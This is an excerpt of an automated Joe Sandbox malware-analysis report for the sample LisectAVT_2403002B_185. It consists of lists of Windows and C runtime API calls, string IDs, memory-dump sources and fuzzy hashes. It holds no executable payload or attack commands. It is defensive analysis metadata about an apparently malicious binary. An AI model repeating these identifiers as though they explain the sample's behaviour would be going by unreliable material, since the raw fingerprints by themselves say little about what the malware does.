                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorFreeHeapLast
                                                              • String ID: PATH$\
                                                              • API String ID: 485612231-1896636505
                                                              • Opcode ID: 30359bae39aef3e52ce3ddb38ea1b0f731bf021ef0dc9d1365b1cdc8e32e3c2b
                                                              • Instruction ID: 6061e630ea3d5d6e7b2bd57d9a3ef56fa68e7e828449ddee99436885a984b9d8
                                                              • Opcode Fuzzy Hash: 30359bae39aef3e52ce3ddb38ea1b0f731bf021ef0dc9d1365b1cdc8e32e3c2b
                                                              • Instruction Fuzzy Hash: 2C91333190470F9EEF25AF64DC0ABBE7FA9BF05324F14085AE650A61C1EF7D8941CA64
                                                              APIs
                                                                • Part of subcall function 005F7531: RtlFreeHeap.NTDLL(00000000,00000000,?,006008E5,005EDE01,00000000,005EDE01,?,00600B86,005EDE01,00000007,005EDE01,?,0060107A,005EDE01,005EDE01), ref: 005F7547
                                                                • Part of subcall function 005F7531: GetLastError.KERNEL32(005EDE01,?,006008E5,005EDE01,00000000,005EDE01,?,00600B86,005EDE01,00000007,005EDE01,?,0060107A,005EDE01,005EDE01), ref: 005F7552
                                                              • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005F7FC1
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 005F7FCE
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005F7FE3
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005F7FEE
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005F7FF9
                                                              • __dosmaperr.LIBCMT ref: 005F8000
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005F800B
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005F8016
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005F8028
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005F8033
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005F8064
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle$ErrorLast$CodeExitFreeHeapObjectProcessSingleWait__dosmaperr
                                                              • String ID:
                                                              • API String ID: 2764183375-0
                                                              • Opcode ID: 2696cc9a873cde2197738230b300433736dd40bced7c658a69eb26f2eb7981d8
                                                              • Instruction ID: 3ef6bd52b8487dad70d5950c9b1c1bf98d14dbfa06c0cdb152ed8725f08e3272
                                                              • Opcode Fuzzy Hash: 2696cc9a873cde2197738230b300433736dd40bced7c658a69eb26f2eb7981d8
                                                              • Instruction Fuzzy Hash: 32516F7294410EFBDF11AFA0E889AFE7F7AFF88311F104095F610A6151DB398A54DBA1
                                                              APIs
                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 005ECEB5
                                                              • type_info::operator==.LIBVCRUNTIME ref: 005ECED7
                                                              • ___TypeMatch.LIBVCRUNTIME ref: 005ECFE6
                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 005ED0B8
                                                              • _UnwindNestedFrames.LIBCMT ref: 005ED13C
                                                              • CallUnexpected.LIBVCRUNTIME ref: 005ED157
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 2123188842-393685449
                                                              • Opcode ID: 7b069761821d2dbaaeeabd13d25e2697b51ec6e5af5486da66ac903abbb39282
                                                              • Instruction ID: 43dbab2e75ec7ff8da253fec9a9df96c8cc675768a1c2347024cbd8e2445ee29
                                                              • Opcode Fuzzy Hash: 7b069761821d2dbaaeeabd13d25e2697b51ec6e5af5486da66ac903abbb39282
                                                              • Instruction Fuzzy Hash: BEB18E7180028ADFCF1DDFA6C8899AEBFB5FF44310F144169E8916B252D731DA52CBA1
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: Yarn$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                              • String ID: bad locale name
                                                              • API String ID: 3904239083-1405518554
                                                              • Opcode ID: 771335bf4a725c9c5c28a07fc89436dd6f2e820b2791e7418de5c83faded9f40
                                                              • Instruction ID: 59eac784c8f416daff9026d0aa2fecb5c462104225e66675954355a0e613dade
                                                              • Opcode Fuzzy Hash: 771335bf4a725c9c5c28a07fc89436dd6f2e820b2791e7418de5c83faded9f40
                                                              • Instruction Fuzzy Hash: F6117FB090569ADFCB0CEB99C869BAEBB71BF40718F14455CE5922B3C2CB755A00C7A1
                                                              APIs
                                                              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,00607207,00000000,00000000,00000000,00000001,?,?,?,?,00000001,00000000), ref: 00606FDD
                                                              • __alloca_probe_16.LIBCMT ref: 00607098
                                                              • __alloca_probe_16.LIBCMT ref: 00607127
                                                              • __freea.LIBCMT ref: 00607172
                                                              • __freea.LIBCMT ref: 00607178
                                                              • __freea.LIBCMT ref: 006071AE
                                                              • __freea.LIBCMT ref: 006071B4
                                                              • __freea.LIBCMT ref: 006071C4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: __freea$__alloca_probe_16$Info
                                                              • String ID:
                                                              • API String ID: 127012223-0
                                                              • Opcode ID: 64bd7689592fd24d9dfb4947e3246469add97a6b148d9332468efb0196a5df5e
                                                              • Instruction ID: 8f714fb58ae2552514cb9af72ab31208d028d800ec984735289a94b3ea70f522
                                                              • Opcode Fuzzy Hash: 64bd7689592fd24d9dfb4947e3246469add97a6b148d9332468efb0196a5df5e
                                                              • Instruction Fuzzy Hash: 1071E972D4824AABDF289F94CC41BEF7BBBAF45310F280595E905A73C1D635AC418760
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 005E9BAD
                                                              • __alloca_probe_16.LIBCMT ref: 005E9BD9
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 005E9C18
                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005E9C35
                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 005E9C74
                                                              • __alloca_probe_16.LIBCMT ref: 005E9C91
                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005E9CD3
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 005E9CF6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                              • String ID:
                                                              • API String ID: 2040435927-0
                                                              • Opcode ID: 27d8af83cc87607de81b89a39c6c4a236c9a4f0bf0ea4f13cd7c0509188c2f2a
                                                              • Instruction ID: 4ba7e8ab0851410acf042e67165ddb2888d77083d2b9e1653b560a91783df535
                                                              • Opcode Fuzzy Hash: 27d8af83cc87607de81b89a39c6c4a236c9a4f0bf0ea4f13cd7c0509188c2f2a
                                                              • Instruction Fuzzy Hash: 8651C07290025AAFEB259F66DC49FAB7FAAFF40750F244528FD45E6150E7319C00CB60
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: _strrchr
                                                              • String ID:
                                                              • API String ID: 3213747228-0
                                                              • Opcode ID: 341f90471d2d8151e31f10acb5a6464dc63b623703efa1fb48c6f26ba17eb951
                                                              • Instruction ID: 574481f6afd96354d4b1d63977541c3cfef93e2366aaae794448abd73ecbf0d3
                                                              • Opcode Fuzzy Hash: 341f90471d2d8151e31f10acb5a6464dc63b623703efa1fb48c6f26ba17eb951
                                                              • Instruction Fuzzy Hash: 61B13572E04A9A9FDF168F68CC81BBE7FA5FF55310F144555EA04AB2C2D278A901C7A0
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005E78B0
                                                              • int.LIBCPMTD ref: 005E78C9
                                                                • Part of subcall function 005E1E00: std::_Lockit::_Lockit.LIBCPMT ref: 005E1E16
                                                                • Part of subcall function 005E1E00: std::_Lockit::~_Lockit.LIBCPMT ref: 005E1E40
                                                              • Concurrency::cancel_current_task.LIBCPMTD ref: 005E7909
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005E7971
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                              • String ID: (w^
                                                              • API String ID: 3053331623-632446344
                                                              • Opcode ID: 7ace4968ac98d6248b4e56db48cb8d9a19e0b128ac1266f8956c4550c46372db
                                                              • Instruction ID: b27d1712de0bfb968d172f4f8a917f98ea1f35a865ec5e31334c4f5844e25300
                                                              • Opcode Fuzzy Hash: 7ace4968ac98d6248b4e56db48cb8d9a19e0b128ac1266f8956c4550c46372db
                                                              • Instruction Fuzzy Hash: 58315EB0D0424ADFCB08DF95C895BEEBBB5BF88310F204619E455B7391DB305A40CBA1
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005E7DD0
                                                              • int.LIBCPMTD ref: 005E7DE9
                                                                • Part of subcall function 005E1E00: std::_Lockit::_Lockit.LIBCPMT ref: 005E1E16
                                                                • Part of subcall function 005E1E00: std::_Lockit::~_Lockit.LIBCPMT ref: 005E1E40
                                                              • Concurrency::cancel_current_task.LIBCPMTD ref: 005E7E29
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005E7E91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                              • String ID: O_^
                                                              • API String ID: 3053331623-897003143
                                                              • Opcode ID: 2ed3fbaa3e53259586453409a994e190349617a5c6b6f76e09a2acf57f281857
                                                              • Instruction ID: 48f6b02dd64f85133f9225e91faee2bb54a80193b484babce42424a436659187
                                                              • Opcode Fuzzy Hash: 2ed3fbaa3e53259586453409a994e190349617a5c6b6f76e09a2acf57f281857
                                                              • Instruction Fuzzy Hash: F1314AB0D0068ADFCB08EFA5D895BFEBBB5BF48310F204659E45567391DB306A00CBA1
                                                              APIs
                                                              • FreeLibrary.KERNEL32(00000000,?,005F89CC,005EDE01,CE3BFFFF,00000000,005EEC9B,00000000,?,005F8BF6,00000022,FlsSetValue,0060CEC8,0060CED0,005EEC9B), ref: 005F897E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 3664257935-537541572
                                                              • Opcode ID: e41d4a04e7644877af87643f4dccea1bd4d6076142d3cb6047bfcaa1fdfe5d04
                                                              • Instruction ID: 5ba9c059b75644c7d216da01d4d87a330c1552024a21e851ede5cd80af984866
                                                              • Opcode Fuzzy Hash: e41d4a04e7644877af87643f4dccea1bd4d6076142d3cb6047bfcaa1fdfe5d04
                                                              • Instruction Fuzzy Hash: 6B212B31A41219ABC7219725DC44ABB3F6AFF41770F254515FB06B7291EBB4ED00C6E1
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: Fgetc
                                                              • String ID:
                                                              • API String ID: 1720979605-0
                                                              • Opcode ID: e4bf427345fcae5a7101f3a998cca7563d5e779dd5171b51e434bf30e2c30830
                                                              • Instruction ID: d382ae5006bfd7848853da941a7a610c3456abe7cb49372b18b77a799e978534
                                                              • Opcode Fuzzy Hash: e4bf427345fcae5a7101f3a998cca7563d5e779dd5171b51e434bf30e2c30830
                                                              • Instruction Fuzzy Hash: AF6192B1C0018A9FCB1CEBE5C956AEEBB74BF54341F604569E19277281EB345E04CF91
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,005ECA41,005EB191,005EA6CA), ref: 005ECA58
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005ECA66
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005ECA7F
                                                              • SetLastError.KERNEL32(00000000,005ECA41,005EB191,005EA6CA), ref: 005ECAD1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: 983c347c6f49bae7637244d6a17cba4e6fd1b2ebb91ca6524387644d8d51cd9a
                                                              • Instruction ID: ceeff01ecc7c66a17bb7f7484c24d5f4c7f83d9ed709945daea3335b4af3e5e8
                                                              • Opcode Fuzzy Hash: 983c347c6f49bae7637244d6a17cba4e6fd1b2ebb91ca6524387644d8d51cd9a
                                                              • Instruction Fuzzy Hash: 5F01687310831A9EE72CD776BC8DA6A2E56FB02375338423AF554821F1EF608C02A164
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tMl$`^q$`^q$`^q$`^q${$Yl^
                                                              • API String ID: 0-1775292322
                                                              • Opcode ID: 3ec1427e95bc4a8886b2348aa1e731d7bed49d0178e2bc93e754bb194dd35855
                                                              • Instruction ID: ba7f09d730abdcb37c37ea6a937eedb50ea7f6acf2db8d85796b039820c6ecdb
                                                              • Opcode Fuzzy Hash: 3ec1427e95bc4a8886b2348aa1e731d7bed49d0178e2bc93e754bb194dd35855
                                                              • Instruction Fuzzy Hash: 19B193B4E012199FCF55DFA9D99099DBBF6FF88304B14862AE409AB314DB34ED05CB90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tMl$`^q$`^q$`^q$`^q${$Yl^
                                                              • API String ID: 0-1775292322
                                                              • Opcode ID: a592dd7163032f37af0a198093f240cf406758b460c9ee03134d64fff1587b67
                                                              • Instruction ID: f364c2a3d8cabdff68c6e57928cdea64dd41aa5d6f77311e3efcd0071be1862e
                                                              • Opcode Fuzzy Hash: a592dd7163032f37af0a198093f240cf406758b460c9ee03134d64fff1587b67
                                                              • Instruction Fuzzy Hash: 10A192B4E012199FCF54DFA9D99099DBBF6FF88304B14862AE409AB314DB34ED05CB90
                                                              APIs
                                                              • _strrchr.LIBCMT ref: 005F7CE0
                                                              • _strrchr.LIBCMT ref: 005F7CEA
                                                              • _strrchr.LIBCMT ref: 005F7CFF
                                                                • Part of subcall function 005F7531: RtlFreeHeap.NTDLL(00000000,00000000,?,006008E5,005EDE01,00000000,005EDE01,?,00600B86,005EDE01,00000007,005EDE01,?,0060107A,005EDE01,005EDE01), ref: 005F7547
                                                                • Part of subcall function 005F7531: GetLastError.KERNEL32(005EDE01,?,006008E5,005EDE01,00000000,005EDE01,?,00600B86,005EDE01,00000007,005EDE01,?,0060107A,005EDE01,005EDE01), ref: 005F7552
                                                                • Part of subcall function 005F146A: IsProcessorFeaturePresent.KERNEL32(00000017,005F143C,?,?,?,?,00000000,?,?,?,005F06BA,00000000,00000000,00000000,00000000,00000000), ref: 005F146C
                                                                • Part of subcall function 005F146A: GetCurrentProcess.KERNEL32(C0000417), ref: 005F148F
                                                                • Part of subcall function 005F146A: TerminateProcess.KERNEL32(00000000), ref: 005F1496
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: _strrchr$Process$CurrentErrorFeatureFreeHeapLastPresentProcessorTerminate
                                                              • String ID: .com
                                                              • API String ID: 3694955208-4200470757
                                                              • Opcode ID: 8e11b7900edcf4068622d1db1ce87774fd536da91a19a78c672c91f6c8f17e78
                                                              • Instruction ID: e8f1c467d71226389e2d7de97b67925dcf198940b10b3ff6a962fceed3033e90
                                                              • Opcode Fuzzy Hash: 8e11b7900edcf4068622d1db1ce87774fd536da91a19a78c672c91f6c8f17e78
                                                              • Instruction Fuzzy Hash: E7512C7250860E6AEF156A34AC49A7F3F5EFF99364F14059DFB00D7182FA698D0182A4
                                                              APIs
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,005EDBA3,?,?,006195C4,00000000,?,005EDCCE,00000004,InitializeCriticalSectionEx,0060AC1C,InitializeCriticalSectionEx,00000000), ref: 005EDB72
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID: api-ms-
                                                              • API String ID: 3664257935-2084034818
                                                              • Opcode ID: a58eb3ce17270e493c32e67fe0a4fee9d9d1942cd37be1c40548e8c0f0ee5304
                                                              • Instruction ID: 6fded04b8b90dea96857fcd90979531f38e11d12af4f88eb0890575eb50e603f
                                                              • Opcode Fuzzy Hash: a58eb3ce17270e493c32e67fe0a4fee9d9d1942cd37be1c40548e8c0f0ee5304
                                                              • Instruction Fuzzy Hash: C111CD31941665ABDF254B599C44B5A3BBEBF017B0F160211E995EB180F770ED00CAF5
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,9EDA4073,005EEC9B,?,00000000,00608A03,000000FF,?,005F37F2,CE3BFFFF,?,005F37C6,?), ref: 005F388D
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005F389F
                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00608A03,000000FF,?,005F37F2,CE3BFFFF,?,005F37C6,?), ref: 005F38C1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 4748708afdbcf74dac3c048c94088a6e4fa73dde8ab21067cc3355614c7d5b29
                                                              • Instruction ID: f8408689c4b83d0c4233f7dbac5efcaf17e59380d1cc84de589d0ffbd65df2f5
                                                              • Opcode Fuzzy Hash: 4748708afdbcf74dac3c048c94088a6e4fa73dde8ab21067cc3355614c7d5b29
                                                              • Instruction Fuzzy Hash: B001A731980659EFDB019F50CC05BBFBBBAFB04755F004629F812A26D0DB789904CA90
                                                              APIs
                                                              • __alloca_probe_16.LIBCMT ref: 005FC118
                                                              • __alloca_probe_16.LIBCMT ref: 005FC1E1
                                                              • __freea.LIBCMT ref: 005FC248
                                                                • Part of subcall function 005F9045: RtlAllocateHeap.NTDLL(00000000,005FF487,00000000,?,005FF487,00000220,?,?,00000000), ref: 005F9077
                                                              • __freea.LIBCMT ref: 005FC25B
                                                              • __freea.LIBCMT ref: 005FC268
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1423051803-0
                                                              • Opcode ID: 8302ed66a2e2c689f92b35dcef2f1fbe542db6b565b7a7a70185f72c6d7197cd
                                                              • Instruction ID: 15d4367f099bedeaf71408c1fbf90cde6ac8cd8534d6376209edafdfa81a7009
                                                              • Opcode Fuzzy Hash: 8302ed66a2e2c689f92b35dcef2f1fbe542db6b565b7a7a70185f72c6d7197cd
